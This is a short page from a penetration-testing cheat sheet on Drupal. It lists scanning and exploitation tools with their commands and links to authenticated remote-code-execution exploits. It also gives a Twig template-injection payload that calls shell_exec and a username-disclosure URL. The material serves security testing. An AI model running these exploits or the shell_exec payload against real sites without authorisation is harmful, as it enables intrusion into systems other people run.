Pentest Book
Search…
Drupal
1
**Tools**
2
# droopescan
3
# https://github.com/droope/droopescan
4
droopescan scan drupal -u https://example.com -t 32
5
6
# drupwn
7
# https://github.com/immunIT/drupwn
8
sudo python3 drupwn --mode enum|exploit --target https://example.com
9
10
# https://github.com/ajinabraham/CMSScan
11
docker build -t cmsscan .
12
docker run -it -p 7070:7070 cmsscan
13
python3 cmsmap.py -f D https://www.example.com -F
14
15
# https://github.com/Tuhinshubhra/CMSeeK
16
python3 cmseek.py -u domain.com
17
18
# Drupal < 8.7.x Authenticated RCE module upload
19
https://www.drupal.org/project/drupal/issues/3093274
20
https://www.drupal.org/files/issues/2019-11-08/drupal_rce.tar_.gz
21
22
# Drupal < 9.1.x Authenticated RCE Twig templates
23
https://www.drupal.org/project/drupal/issues/2860607
24
"Administer views" -> new View of User Fields - >Add a "Custom text"
25
"{{ {"#lazy_builder": ["shell_exec", ["touch /tmp/hellofromviews"]]} }}"
26
27
# If found /node/$NUMBER, the number could be devs or tests pages
28
29
# drupal 8
30
# https://www.exploit-db.com/exploits/46459
31
32
# Check for username disclosure on old versions:
33
?q=admin/views/ajax/autocomplete/user/a
34
Copied!
Last modified 2mo ago
Export as PDF
Copy link